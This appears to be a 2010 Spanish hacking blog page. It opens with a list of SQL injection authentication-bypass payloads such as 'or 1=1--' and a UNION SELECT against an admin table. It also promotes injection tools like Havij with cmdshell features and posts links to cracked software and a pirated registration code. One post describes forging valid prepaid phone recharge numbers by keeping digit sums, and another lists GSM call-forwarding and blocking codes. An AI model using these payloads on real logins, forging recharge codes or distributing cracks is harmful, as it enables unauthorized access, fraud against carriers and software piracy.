| Mobile| RSS

Injeton

asp aspx
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:   1 or '1'='1'=1
12:   1 or '1'='1' or 1=1
13:   'OR 1=1
14:   "or 1=1
15: 'xor 
16:   用户名   ' UNION Select 1,1,1 FROM admin Where ''='     (admin)
    1




PHP
'or 1=1/*



jsp
1'or'1'='1

domingo, 28 de noviembre de 2010 | Tags: | 0 comentario [ Mas... ]

Armitage v11.25.10


Armitage - Cyber Attack Management for Metasploit
Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don't use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Changelog:
- start msf button now kills msfrpcd session if db_connect fails
- set default database options to mysql with BackTrack 4 R2 settings.
- Armitage -> Exit menu now kills msfrpcd, if the "Start MSF" button was used
- Added ability to set up a multi/handler from Payload launch dialog

Download and more details: http://www.fastandeasyhacking.com

Video demo: Armitage - Fast and Easy Hacking

trukito para hacer recargas telefonicas.

que pasa troopaa jejj bueno aki les traigo un pequeño truco ...
todos sabemos comprar una targeta para una recarga si esa cosa cuadrada que le compras
al kioskiero y qe ademas necesitas rascarla para ver los numeritos ..
lo que voy a xplicaros un poco como con algunos cambios podemos volver a hacer una recarga..
bueno cambiando la 2 ª, 3 ª, 4 ª, 5 ª, 6 ª y 7 ª serie (se lee de derecha a izquierda ..)
pero manteniendo su suma
por ejemplo,
Tengo esta tarjeta de recarga de
12755486734598
Voy a cambiar "275.548"
es 2 +7 +5 +5 +4 +8 = 31 y a + b + c + d + e + f = En su igualdad 7 4 3 9 5 3 = 31
y B 2 7 +5 = 14 y a + b + c = B y también 7 4 3 = 14
C y 5 4 8 = 17 y D + E + F = C igual etsa 9 5 3 = 17
Px me ha puesto su lugar, mientras que "743.953"
y AC como 1abcdef6734598 = 17439536734598
12755486734598
2 º voy a cambiar "673.459"
en 6 +7 +3 +4 +5 +9 = 34, x + y + z + t k + + r = D ca igualdad de 7 +7 +2 +8 +7 +3 = 34
y B 6 +7 +3 = 16, x + y + z = E, y es igual a 7 +7 +2 = 16
y C 4 +5 +9 = 18 y t + k + r = F y la igualdad de 8 +7 +3 = 18 y AC como 1abcdefxyztkr8 = 17439537728738
y el número válido de la nueva acusación es la siguiente:
17439537728738
cuando tenga tiempo voy hacer un generador con excel

domingo, 21 de noviembre de 2010 | Tags: | 2 comentario [ Mas... ]

SqlInjector v1.0.2 released

SqlInjector v1.0.2 


BlindSQLInjector is an application to perform completely blind SQL injection. Currently it only supports MS SQL Server. It uses time based inference to determine true or false conditions to extract data. The key feature is that it uses a binary search mechanism to reduce the character search address space, this means it can get each character value within 7 to 8 requests.

This is a fairly major update to SqlInjector (yes renamed from BlindSqlInjector). The key change is the addition of true/false inference. So if you have SQLi then its definitely faster to use true/false inference rather than time. I have also added a video of the new true/false inference in action to the project page.

Download: http://www.woany.co.uk

SqlInjector in action: http://www.woany.co.uk

jueves, 11 de noviembre de 2010 | Tags: | 1 comentario [ Mas... ]

WebCruiser - Web Vulnerability Scanner V2.4.2

WebCruiser - Web Vulnerability Scanner V2.4.2
http://sec4app.com/download/WebCruiserEnt.zip
Username: www.shell2me.com
RegCode : A446-C1E0-4012-EC00

domingo, 7 de noviembre de 2010 | Tags: | 0 comentario [ Mas... ]

ScrapeBox


ScrapeBox v1.9.59 Crack working
http://www.multiupload.com/Q6NJQ0069E


http://www.scrapebox.com/

sábado, 23 de octubre de 2010 | Tags: | 2 comentario [ Mas... ]

Havij 1.12

What's New?
-HTTPS Support
-MsSQL Blind added
-MsAccess Blind added (Commerical version only)
-PostgreSQL added (Commerical version only)
-Check for update added.
-Manual queries with result added. (Commerical version only)
-1 row per 1 request (all in one request) added (Commerical version only)
-Dumping data into file added (Commerical version only)
-Saving data in XML format added (Commerical version only)
-Injecting targets with any port added (default http port is 80) (Commerical version only)
-XSS bug in saved reports fixed.
-Clear log added.
-Apply button added to the settings so it is possible to change the settings anytime (Commerical version only)
-keyword test and correction method added.
-finding columns count and string column optimized for better injection and data base detecting.
-Finding columns count and string column made better.
-"414 Request-URI too long" bug fixed.
-New method for getting tables and columns in mssql added.
-Some bugs in MsAccess injection when syntax has been defined manually fixed.
-Enable XP_Exec added to cmdshell (Commerical version only)
-Enable OS_Ex added to cmdshell (Commerical version only)
-Enable remote desktop added to cmdshell (Commerical version only)
-Confusing MsSQL 2005 with MySQL when finding columns count fixed.
-Broken MD5 cracker sites removed.
-a bug in detecting mssql no error fixed.
-a bug in getting columns in mssql no error fixed.
-a bug in injecting into access database fixed.
-a bug in getting data in mssql fixed.
-a bug in finding mssql's row count fixed.
-a bug in detecting database type when column count is found fixed.
-a bug in MsSQL no error manual syntax and command executation fixed.
http://www.multiupload.com/ICJDSYRQ0G free
http://uploading.com/files/get/bb31dafc/ profesional
http://rapidshare.com/#!download|269|429136417|havij.v1.12-installer_and_crack.rar|2713

Netsparker

Netsparkers professional Updates 1.5.0.5

http://www.multiupload.com/MLBRI287JJ
http://www.multiupload.com/MU_MLBRI287JJ
http://www.multiupload.com/DF_MLBRI287JJ
http://www.multiupload.com/HF_MLBRI287JJ
http://www.multiupload.com/ZS_MLBRI287JJ
http://www.multiupload.com/UP_MLBRI287JJ
http://www.iitlab.com/?p=84

codigos telefonia

esto la saque de una web hace tiempo es viejito pero siempre es bueno saberlo son codigos para telefonos moviles y algunos para fijos espero les sirva, me gustaria que aporten con algunos que sepan muchas gracias.


Todas las llamadas
Inmediato
Activar: **21*NUMERO*(Lista Servicios)# [SEND]
Cancelar: ##21# [SEND]
Estado: *#21# [SEND]

Retardado
Activar: **002*NUMERO*(Lista Servicios)**(de 5 a 30 Segundos)# [SEND]
Cancelar: ##002# [SEND]
Estado: *#002# [SEND]

Condicional
Activar: **004*NUMERO*(Lista Servicios)**(de 5 a 30 Segundos)# [SEND]
Cancelar: ##004# [SEND]
Estado: *#004# [SEND]

No responde
Activar: **61*NUMERO*(Lista Servicios)**(de 5 a 30 Segundos)# [SEND]
Cancelar: ##61# [SEND]
Estado: *#61# [SEND]

No le encuentra
Activar: **62*NUMERO*(Lista Servicios)# [SEND]
Cancelar: ##62# [SEND]
Estado: *#62# [SEND]

Ocupado
Activar: **67*NUMERO*(Lista Servicios)# [SEND]
Cancelar:: ##67# [SEND]
Estado: *#67# [SEND]
Cancelar TODOS los desvios de llamada
##002# [SEND]
NOTA: Las opciones entre parentesis son opcionales. [SEND] es el boton de "descolgar" suele ser un phone verde.
________________________________________
BLOQUEO DE LLAMADA

Bloquear todas las llamadas SALIENTES

Activar: *33*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #33*CODEBLOKEO# [SEND]

Estado: *#33# [SEND]

Bloquear todas las llamadas salientes INTERNACIONALES

Activar: *331*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #331*CODEBLOKEO# [SEND]

Estado: *#331# [SEND]

Bloquear todas las llamadas SALIENTES INTERNACIONAES (excepto al pais de origen)

Activar: *332*CODEBLOKEO*(Lista Servicios)#> [SEND]

Cancelar:: #332*CODEBLOKEO# [SEND]

Estado: *#332# [SEND]

Bloquear todas las llamadas ENTRANTES

Activar: *35*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #35*CODEBLOKEO# [SEND]

Estado: *#35# [SEND]

Bloquear todas las llamadas ENTRANTES en el EXTRANJERO

Activar: *351*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #351*CODEBLOKEO# [SEND]

Estado: *#351# [SEND]

Bloquear TODAS las llamadas

Activar: *330*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #330*CODEBLOKEO# [SEND]

Estado: *#330# [SEND]

CANCELAR todos los bloqueos de llamadas

#330*CODEBLOKEO# [SEND]

NOTA: Las opciones entre parentesis son opcionales. [SEND] es el boton de "descolgar" suele ser un phone verde.CODEBLOKEO es un codigo exclusivo para blokear las llamadas por defecto creo q es 1234 pero se puede cambiar asi:
**03*OLD_CODEBLOKEO*NEW_CODEBLOKEO*NEW_CODEBLOKEO# o
**03**OLD_CODEBLOKEO*NEW_CODEBLOKEO*NEW_CODEBLOKEO#
________________________________________

LLAMADA EN ESPERA

Activar: *43# [SEND]

Cancelar: #43# [SEND]

Estado: *#43# [SEND]

Para finalizar una llamada en espera: 0 [SEND]
Para finalizar la llamada actual y contestar a la q esta en espera: 1 [SEND]
Para poner en espera la llamada actual: 2 [SEND]]
Para añadir la llamada en espera a la llamada actual(llamada a tres, party-line ;-) ): 3 [SEND]
Para hacer una nueva llamada y poner la actual en espera: NUMERO [SEND]
Para finalizar todas la llamadas activas, excepto las q estan en espera: [END]
________________________________________
NUMEROS PIN

Cambiar numeros PIN

PIN: **04*OLD_PIN*NEW_PIN*NEW_PIN#

PIN2: **042*OLD_PIN2*NEW_PIN2*NEW_PIN2#

Desbloquear numeros PIN

PIN: **05*PUK*NEW_PIN*NEW_PIN#

PIN2: **052*PUK2*NEW_PIN2*NEW_PIN2#
________________________________________
CALLER ID (envio/ocultacion del numero al hacer una llamada o recibirla)

Al llamar

Activar: *31# [SEND]

Cancelar: #31# [SEND]

Estado: *#31# [SEND]

Al recibir

Activar: *30# [SEND]

Cancelar: #30# [SEND]

Estado: *#30# [SEND]

Temporal (solo para una llamada)

No mostrar: *31#NUMERO [SEND]

Mostrar: #31#NUMERO [SEND]
COLP :-? (no sabemos q es esto)

Activar: *76# [SEND]

Cancelar: #76# [SEND]

Estado: *#76# [SEND]

COLR :-? (no sabemos q es esto)

Activar: *77# [SEND]

Cancelar: #77# [SEND]

Estado: *#77# [SEND]

domingo, 17 de octubre de 2010 | Tags: | 0 comentario [ Mas... ]

Joomla Scan v1.2


Joomla Scan v1.2

Acabo de subir a la web un nuevo programa que he terminado (tengo varios a medias siempre :) ). Se trata de JoomlaScan, y lo que hace básicamente es analizar remotamente una web (Joomla, claro!) y detectar la versión que está corriendo. Salvo un par o tres de versiones que no saca exactas, el resto te da con exactitud la versión y revisión que usa, incluidas las betas de la 1.6. Además de esto también saca un listado con los componentes que usa.
Para la detección de versión de Joomla me he basaco en un genial script en perl de OWASP, cuyo proyecto se abandonó en diciembre del 2008 y, por lo cual sólo era capaz de detectar hasta la versión 1.5.12.
El método usado consiste en comprobar una serie de ficheros que varían de una versión a otra, así como otros que contienen el ID de la última revisión. En resumen, ralizando muchas verificaciones en varios ficheros se llega a acortar el margen entre versiones hasta dar con la exacta.
Además de eso, me he pegado la gran currada de introducir todos los avisos que hay en securityfocus y que hacen referencia a Joomla, de manera que tras detectar la versión, muestra un listado con los posibles bugs que afectan a esa versión o a cualquiera de los componentes instalados.
El programa al arrancarse comprueba si hay nuevas versiones o actualizaciones de la base de datos, de manera que cada vez que suba un nuevo bug se actualizará sólo.
Podeis descargarlo aquí: JoomlaScan

viernes, 24 de septiembre de 2010 | Tags: | 1 comentario [ Mas... ]

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter